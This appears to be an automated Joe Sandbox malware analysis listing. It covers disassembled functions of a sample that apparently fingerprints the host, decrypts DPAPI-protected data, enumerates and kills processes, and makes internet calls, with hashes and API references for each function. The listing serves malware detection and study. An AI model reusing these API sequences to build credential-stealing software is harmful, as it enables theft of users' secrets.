Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
Opcode Fuzzy Hash: 87c4ecc5cae1bb30076c5fa7cae4b4b31d77e3e1fa7da15e9efafcded89b07fc
Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004065D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F

Strings

:h@, xrefs: 004065DD, 004065FD, 0040667F
:h@, xrefs: 0040660D, 00406629, 00406678, 00406688, 004065F4, 00406618, 00406623
@:h@, xrefs: 00406670, 00406673

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: :h@$:h@$@:h@
API String ID: 544645111-3492212131
Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEC0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02D31B90,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
lstrlen.KERNEL32(00000000), ref: 0040D0DF
lstrlen.KERNEL32(00000000), ref: 0040D0F3
DeleteFileA.KERNEL32(00000000), ref: 0040D16C

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: e6516416815714df6453fd4f82fac44d28edec781fd119e966b198ebd49bc1bd
Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
Opcode Fuzzy Hash: e6516416815714df6453fd4f82fac44d28edec781fd119e966b198ebd49bc1bd
Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD10 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,02D36278,00000000,00020119,00000000), ref: 0041433B
Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,02D78330,00000000,00000000,000000FF,000000FF), ref: 0041435C
Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366

Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,02D788E0,00000000,?,0041D74C,00000000,?,00000000,00000000,?,02D75688), ref: 0041438F
Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,02D788E0,00000000,?,0041D74C,00000000,?,00000000,00000000,?,02D75688), ref: 00414396

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02D755D8,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0

Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,02D78288,00000000,?,0041D758,00000000,?,00000000,00000000,?,02D78900,00000000), ref: 004144C0
Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA

Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,02D78288,00000000,?,0041D758,00000000,?,00000000,00000000,?,02D78900,00000000), ref: 00414542

Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF

Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A

GetCurrentProcessId.KERNEL32(00000000,?,02D78920,00000000,?,0041D76C,00000000,?,00000000,00000000,?,02D78318,00000000,?,0041D768,00000000), ref: 0041037E

Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF

Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,02D360B8,00000000,00020119,00000000), ref: 0041477B
Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,02D78940,00000000,00000000,000000FF,000000FF), ref: 0041479C
Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855

Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3

Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,02D77D78,00000000,?,0041D774,00000000,?,00000000,00000000,?,02D78378), ref: 0041496D
Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9

Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,02D5D1D8,00000000,00020019,00000000,0041D289), ref: 00414B41

Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
Part of subcall function 00414DE0: CloseHandle.KERNEL32(00000000), ref: 00414E9E

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02D75648), ref: 00404ED9

Strings

E.A, xrefs: 00410981, 004109AC, 00410984

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentHandleInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalInternetLastLogicalMemoryModuleNextPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
String ID: E.A
API String ID: 2827757392-2211245587
Opcode ID: 0a1655d69d7d67d09a8accf2191c0ab67cebd284527337da85d13474bea66144
Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
Opcode Fuzzy Hash: 0a1655d69d7d67d09a8accf2191c0ab67cebd284527337da85d13474bea66144
Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004096C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: CloseHandle.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,02D78078), ref: 0040971B

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

memcmp.MSVCRT ref: 00409774

Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF

Strings

DPAPI, xrefs: 0040976B
, xrefs: 004097A3

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 1204593910-1819349886
Opcode ID: c29f5cfde4a1b01b633900b3e4d9158c792444f62c15d0bc86c9e383e366a528
Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
Opcode Fuzzy Hash: c29f5cfde4a1b01b633900b3e4d9158c792444f62c15d0bc86c9e383e366a528
Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00415BD0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00415BEB

Part of subcall function 00415450: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
Part of subcall function 00415450: HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
Part of subcall function 00415450: wsprintfW.USER32 ref: 00415478

OpenProcess.KERNEL32(00001001,00000000,?), ref: 00415CAB
TerminateProcess.KERNEL32(00000000,00000000), ref: 00415CC9
CloseHandle.KERNEL32(00000000), ref: 00415CD6

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: 819b6fa9bb5d4f5164abcc91ef5b86bd2ecbab84fbb63b55ca930f6f6dd531f4
Instruction ID: 9bd26bda15b00488fb04890a05ea267a73874a1d1a12279ce6d54c29d70e7cb6
Opcode Fuzzy Hash: 819b6fa9bb5d4f5164abcc91ef5b86bd2ecbab84fbb63b55ca930f6f6dd531f4
Instruction Fuzzy Hash: B7311E71A00708DFDB24DFD0CD49BEDB775BB88304F204459E506AA284EB78AA85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004159E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
CloseHandle.KERNEL32(000000FF), ref: 00415A27

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44

Uniqueness

Uniqueness Score: -1.00%

Function 004137B3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02D754F8,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,02D754F8,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

Pi@, xrefs: 004067C2, 0040684E, 0040689F, 0040679E, 00406884

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID:
String ID: Pi@
API String ID: 0-1360946908
Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Strings

<, xrefs: 00404489

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlenmalloc
String ID: <
API String ID: 3848002758-4251816714
Opcode ID: a6808b5ae06e865dd57837c1360dbca8d7f8aed1df0adfe68f7373d4d3d25dfb
Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
Opcode Fuzzy Hash: a6808b5ae06e865dd57837c1360dbca8d7f8aed1df0adfe68f7373d4d3d25dfb
Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF80 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,02D754D8), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,02D75668), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,02D756D8), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 3566f950a70d9368d3bab53622fd0af9e896664e0c11b1e93c9bcc657f6cdd2a
Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
Opcode Fuzzy Hash: 3566f950a70d9368d3bab53622fd0af9e896664e0c11b1e93c9bcc657f6cdd2a
Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF9F Relevance: 4.7, APIs: 3, Instructions: 177COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,02D754D8), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,02D75668), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,02D756D8), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 6db915fc9aef32804234284a1f8f815ae03aa27e0320bb305d1a5402418195c7
Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
Opcode Fuzzy Hash: 6db915fc9aef32804234284a1f8f815ae03aa27e0320bb305d1a5402418195c7
Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 00415B70 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
CloseHandle.KERNEL32(00000000), ref: 00415BAF

Memory Dump Source

